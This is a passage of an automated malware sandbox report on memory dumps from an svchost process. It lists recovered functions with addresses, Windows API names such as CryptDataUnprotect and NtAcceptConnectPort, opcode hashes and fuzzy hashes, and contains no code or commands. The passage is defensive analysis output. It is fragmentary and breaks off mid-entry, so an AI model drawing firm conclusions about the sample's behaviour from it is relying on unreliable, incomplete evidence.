                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: free
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 0cba3b52d22fc22b11fda789372843ae04e2053c3aa275865dfb441ab6df4247
                                                                                                                                                                                                                                                                                                              • Instruction ID: 9abf9d6fb10fb0ac83d71beaa4d6c7d16de7919013604a9ee09cceb54264b499
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0cba3b52d22fc22b11fda789372843ae04e2053c3aa275865dfb441ab6df4247
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0302913061DA488BE765EB19D455B9BB7E1FF94304F40492EE05FC3292DE35E845CB82
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE6060F0 Relevance: 1.6, APIs: 1, Instructions: 114encryptionCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: CryptDataUnprotect
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 834300711-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 856649e5fd06967893b9de20f468b6bbeb41857baffe77d0d88ed87af2e6e484
                                                                                                                                                                                                                                                                                                              • Instruction ID: 1e6b647f0010a3cd38b7bf7220643289ca46356d58d7b30798f22f3b8e9d71a6
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 856649e5fd06967893b9de20f468b6bbeb41857baffe77d0d88ed87af2e6e484
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 06318F3071DA484FE748EB6DD85966FB7E1FB88345F40497EE44BC3291DA38D8028782
                                                                                                                                                                                                                                                                                                              Function 0000018B292A15C0 Relevance: 1.6, APIs: 1, Instructions: 76nativeCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              • NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,00000000,0000018B292A1E3A), ref: 0000018B292A1654
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000002.2739348169.0000018B292A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000018B292A0000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_2_18b292a0000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 1658770261-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 1eb38bd4e9810c4692bda8c47b34b9a63fb6abd40dd4841afe63035e04063970
                                                                                                                                                                                                                                                                                                              • Instruction ID: 9ccadb5f4bb02f2995b472cff76e84ee22d42ef73e838809ebe04499f63f22b8
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1eb38bd4e9810c4692bda8c47b34b9a63fb6abd40dd4841afe63035e04063970
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9821847190CB048FDB58DF18C4C9AA9F7E2FB68345F044A2EE44AC7251DB30D584CB41
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE60E25C Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 1658770261-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 4cf3975fe2f826ffe67f273e2a1973cf5c2994fe7bf33f6883edfc4130774661
                                                                                                                                                                                                                                                                                                              • Instruction ID: 976177849fe7d15c4d09bfa13e9a08c7eb4971b1965aa084aadd21e7a24c2bec
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4cf3975fe2f826ffe67f273e2a1973cf5c2994fe7bf33f6883edfc4130774661
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 10F0BD30A1CB948FDF64EB2CD489B5A77E1FB98304F508519E84CC3345DA3498808B86
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE60E094 Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 1658770261-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 04777103404d42a3d8809544d07e3f94752c09d4e382fb2d5f2ce09ccce6d52b
                                                                                                                                                                                                                                                                                                              • Instruction ID: 86ddfc1baf9158a9ff51558e2a60300b0461a3812693bf5ce96daff1381ca45b
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 04777103404d42a3d8809544d07e3f94752c09d4e382fb2d5f2ce09ccce6d52b
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 95F0B634A1D7C48FDBA0DB288584B5ABBF0BB99344F54591EE4CCC3311D73594848B03
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE60E3E8 Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 1658770261-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 5596204144bf6387c6881bf1fa4f57717ef6e785025276df84d2fa40d30d7839
                                                                                                                                                                                                                                                                                                              • Instruction ID: 06eab52f794ad90d8e5f10e2dca5d82429733aeca618c4ddda5cc98f669acfc5
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5596204144bf6387c6881bf1fa4f57717ef6e785025276df84d2fa40d30d7839
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ECE09231619A588FDF04DF98D8C19ABB7F0EBD8314F404D7AE85BCB164D264E698C682
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE60E170 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 1658770261-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: c0f707815c29bc5e42aa1d0e63f012e02fb8cc729e2b5fa34e6064e28ee2c0b2
                                                                                                                                                                                                                                                                                                              • Instruction ID: 2af930fbec4f5a44538c9fcb7591d3879e244cb30067c3d1f2e0f102418ef82f
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c0f707815c29bc5e42aa1d0e63f012e02fb8cc729e2b5fa34e6064e28ee2c0b2
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F3D05E30E28AA94BEA10A7299A4461637E1FB99308F908A54D44DC3200E23CE4818783
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE60E3C8 Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 1658770261-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 3ea98e83cefaff0a53491c51114555ceb5585970405d7fffab8276f48ff2d2ab
                                                                                                                                                                                                                                                                                                              • Instruction ID: 14899ace3537b99430d0322409ca8ecf4f732662f9ab8d9f9f1c992e6b366156
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ea98e83cefaff0a53491c51114555ceb5585970405d7fffab8276f48ff2d2ab
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1CC08000E2EC165DFE08636B5D806173490575C304FC05420E41AC1380E44CD4C08391
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE60E150 Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              • NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,?,00007DF4AE60C0F7), ref: 00007DF4AE60E160
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 1658770261-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: af8779bb09c2e78d507a3ecc3102d682b92eeb4da621b6902aa3ae21c98f3f52
                                                                                                                                                                                                                                                                                                              • Instruction ID: 7b1d73817aa604edff4cb9b702b8f8a49886f93ef493b2638b16befe441e5428
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: af8779bb09c2e78d507a3ecc3102d682b92eeb4da621b6902aa3ae21c98f3f52
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DEC08C30E5A92B8FFD0873AB6E8830732A0AB8C318FC04491942AC2280E81CE4C04393
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE5E4998 Relevance: 4.9, APIs: 2, Strings: 1, Instructions: 354COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: freemalloc
                                                                                                                                                                                                                                                                                                              • String ID: x
                                                                                                                                                                                                                                                                                                              • API String ID: 3061335427-2363233923
                                                                                                                                                                                                                                                                                                              • Opcode ID: 4a23361acd3c5010fa95a7889096e57418eca08b4db551f685a2055cf61445d8
                                                                                                                                                                                                                                                                                                              • Instruction ID: 04a1c12b970027eaf7a9e38cb21dfd0dfbe1bb8c3fa8a23cec6aec8af7113dad
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4a23361acd3c5010fa95a7889096e57418eca08b4db551f685a2055cf61445d8
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 45B1C631A1DA844EE329A719D5956EBB7E1FF94304F50096EE0DFC3283DD38E606C686
                                                                                                                                                                                                                                                                                                              Function 0000018B293B33B0 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 350memoryCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2368903962.0000018B293B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000018B293B0000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_18b293b0000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: FreeHeap
                                                                                                                                                                                                                                                                                                              • String ID: x
                                                                                                                                                                                                                                                                                                              • API String ID: 3298025750-2363233923
                                                                                                                                                                                                                                                                                                              • Opcode ID: 66731f1b482563bc89d9877d94cc40398e3a5f4cddffed67c8b36e4cd925d657
                                                                                                                                                                                                                                                                                                              • Instruction ID: 7e72c5a858be10fa1b43ab8e3dc4ce763cb178f03f5d8c6172e7298376114bc7
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 66731f1b482563bc89d9877d94cc40398e3a5f4cddffed67c8b36e4cd925d657
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B4B13C3165CA688BD72DAA38C4E1AFA77D2FB84344F10455DE4DBC3187EE30EA528781
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE5FA0AC Relevance: 3.4, APIs: 2, Instructions: 397COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: CreateFile$AcceptConnectMappingPortcalloc
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 2835849967-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 2a318457211b092fa66bf8b2973391630cb524d3b6c5d734c1c63d700200efc5
                                                                                                                                                                                                                                                                                                              • Instruction ID: 26988957ed14c578f568d1e92deb7ce1a31a003c3e792bd981eb6d965c8d0ccc
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2a318457211b092fa66bf8b2973391630cb524d3b6c5d734c1c63d700200efc5
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4DD1403151CB888BE765DF65D4956ABB7E0FB94304F004A2EE49FC2292EF34E5058B82
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE6DE854 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 247COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: X
                                                                                                                                                                                                                                                                                                              • API String ID: 0-3081909835
                                                                                                                                                                                                                                                                                                              • Opcode ID: 54adf88660b01f72c36151e31c36d8d530975ba1749bbb41913897417559b320
                                                                                                                                                                                                                                                                                                              • Instruction ID: 6f050649529ac62e625a5bfbf743e9b1286aa716b6401b9eeb84fed93b7c9774
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 54adf88660b01f72c36151e31c36d8d530975ba1749bbb41913897417559b320
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 63719E70919F088FD768DF29C5C51A677E4FB48314B901A2FD8ABC3792D734E8468B81
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE61128C Relevance: 3.2, APIs: 2, Instructions: 238fileCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: File$CreateReadmalloc
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 3950102678-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 8175896fcb390573fe24891a245c90aa42f7386ef66d6d03b2c37bfbfb92b4ab
                                                                                                                                                                                                                                                                                                              • Instruction ID: 1d22c15433128e75f9b98f6b00011dabf6cb519a6dded47e4405f166acde93ec
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8175896fcb390573fe24891a245c90aa42f7386ef66d6d03b2c37bfbfb92b4ab
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6071D47060EB844FE7599F1985C43ABB2E1FB98305F90193EE49FC3392DA3998458642
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE5F9F24 Relevance: 3.2, APIs: 2, Instructions: 163fileCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: File$CreateRead
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 3388366904-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: c78e9145d2b58ff95487b29f54b2ad6a864e77d3b5d2f7d4ec89dfbd1d437d0c
                                                                                                                                                                                                                                                                                                              • Instruction ID: 26a87039a5283a5ec65760b03968324c7c108cb6ba0735e3c75bc289753c84ce
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c78e9145d2b58ff95487b29f54b2ad6a864e77d3b5d2f7d4ec89dfbd1d437d0c
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D41C57060C6484FEB58EF69A89566BB7E5FBD9705F04052EE88BC3291EE34D9018783
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE638194 Relevance: 3.1, APIs: 2, Instructions: 139COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: Completion$CreateFileModesNotificationPort
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 3755109111-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 7a1967616059b3e6c90ec46054d4157d5f1fa80a14d9bea4bf5b0a22eb7d1503
                                                                                                                                                                                                                                                                                                              • Instruction ID: c97b1814c2d7c897dba6bb3e053b2c4ab545cb904dbafe73cec4f26bbdd9ae77
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a1967616059b3e6c90ec46054d4157d5f1fa80a14d9bea4bf5b0a22eb7d1503
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E411730619E454FE768AB28D9986EB37E1FF49305F94153AE45BC22D1DB38DC028782
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE639488 Relevance: 3.1, APIs: 2, Instructions: 117COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: Completion$CreateFileModesNotificationPort
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 3755109111-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: a0188f15f0f55639413b935e0f9e52b5b67f8cb31f9b30338d0719667cf6a9eb
                                                                                                                                                                                                                                                                                                              • Instruction ID: 8a359885cbc06c3661a67b73dc6802da53f497f97651aa2a71de4c781c295bf1
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a0188f15f0f55639413b935e0f9e52b5b67f8cb31f9b30338d0719667cf6a9eb
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F631D8307095864FFB549B2DD9842A732E4EF55329F90157AD81FC238BDA29DC828B51
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE610E5C Relevance: 3.1, APIs: 2, Instructions: 101fileCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: File$CreateRead
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 3388366904-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: b6bf591d6850f71c9b943434f57521467a92e42e2958a71744576a35db589d24
                                                                                                                                                                                                                                                                                                              • Instruction ID: 891e2dac368168122739b095ba02af031def58b4b214e4c2a705b1dabe59cac4
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6bf591d6850f71c9b943434f57521467a92e42e2958a71744576a35db589d24
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9E21277070D7480FE7659F59A8C627B73E4EB99724F40253EE89FC3342DA75A8064282
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE607598 Relevance: 2.6, APIs: 2, Instructions: 139COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: malloc
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 2803490479-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 07a9124dfceae028a3317908ae6002e6db3b01a657e18977bfda4f97c253f38a
                                                                                                                                                                                                                                                                                                              • Instruction ID: 4ad7562c8d1dfeb68584af8ce4d6d50092a11b42368e7c2ac3384d8e6857815d
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 07a9124dfceae028a3317908ae6002e6db3b01a657e18977bfda4f97c253f38a
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1541A430619D0E8FEB84EF2DD888AA577F0FB68306754866BD41AC3751DB34E8808BC0
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE60778C Relevance: 2.5, APIs: 2, Instructions: 42COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: free
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 89be67091896b1da07f700886e1e4d9fcad1effbef51436963846972d87fbccb
                                                                                                                                                                                                                                                                                                              • Instruction ID: cd0e90bec747b5e9365c540b465d5fd8c4eb3ec00bc11a19571285935fabe277
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 89be67091896b1da07f700886e1e4d9fcad1effbef51436963846972d87fbccb
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 47F09630216D1A4FFB85EF19C0C476277E1FB58306F60447AD41AC3250D779A894C710
                                                                                                                                                                                                                                                                                                              Function 0000018B293B30C7 Relevance: 1.9, APIs: 1, Instructions: 390memoryCOMMON
